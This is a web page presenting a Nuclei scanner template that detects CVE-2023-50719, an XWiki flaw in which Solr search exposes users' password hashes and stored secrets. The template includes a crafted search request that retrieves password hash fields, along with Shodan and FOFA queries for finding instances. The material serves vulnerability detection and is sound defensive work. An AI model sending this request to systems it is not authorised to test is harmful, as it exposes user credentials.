Skip to content

XWiki < 4.10.15 - Sensitive Information Disclosure

ID: CVE-2023-50719

Severity: high

Author: ritikchaddha

Tags: cve,cve2024,xwiki,password,exposure

XWiki Platform is a generic wiki platform. Starting in 7.2-milestone-2 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the password hashes of all users to anyone with view right on the respective user profiles. By default, all user profiles are public. This vulnerability also affects any configurations used by extensions that contain passwords like API keys that are viewable for the attacker. Normally, such passwords aren’t accessible but this vulnerability would disclose them as plain text. This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1. There are no known workarounds for this vulnerability.

id: CVE-2023-50719
info:
name: XWiki < 4.10.15 - Sensitive Information Disclosure
author: ritikchaddha
severity: high
description: |
XWiki Platform is a generic wiki platform. Starting in 7.2-milestone-2 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the password hashes of all users to anyone with view right on the respective user profiles. By default, all user profiles are public. This vulnerability also affects any configurations used by extensions that contain passwords like API keys that are viewable for the attacker. Normally, such passwords aren't accessible but this vulnerability would disclose them as plain text. This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1. There are no known workarounds for this vulnerability.
impact: |
Successful exploitation could lead to disclosure of the password hashes of all users.
remediation: |
This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1.
reference:
- https://jira.xwiki.org/browse/XWIKI-21208
- https://nvd.nist.gov/vuln/detail/CVE-2023-50719
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-50719
cwe-id: CWE-359
cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
metadata:
max-request: 2
verified: true
vendor: xwiki
product: xwiki
shodan-query: html:"data-xwiki-reference"
fofa-query: body="data-xwiki-reference"
tags: cve,cve2024,xwiki,password,exposure
http:
- method: GET
path:
- "{{BaseURL}}/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale="
- "{{BaseURL}}/xwiki/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale="
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "hash:SHA</span>"
- "XWikiUsers[0].password"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100f7c45a29b4e3080ab52486ca48f1f7c7ffb638bd577db4218bf60b8ddf0003a50220584839ec5dd7b28483641b17acc6e088ceba80d9002054229937f0c2a0347977:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-50719.yaml"

View on Github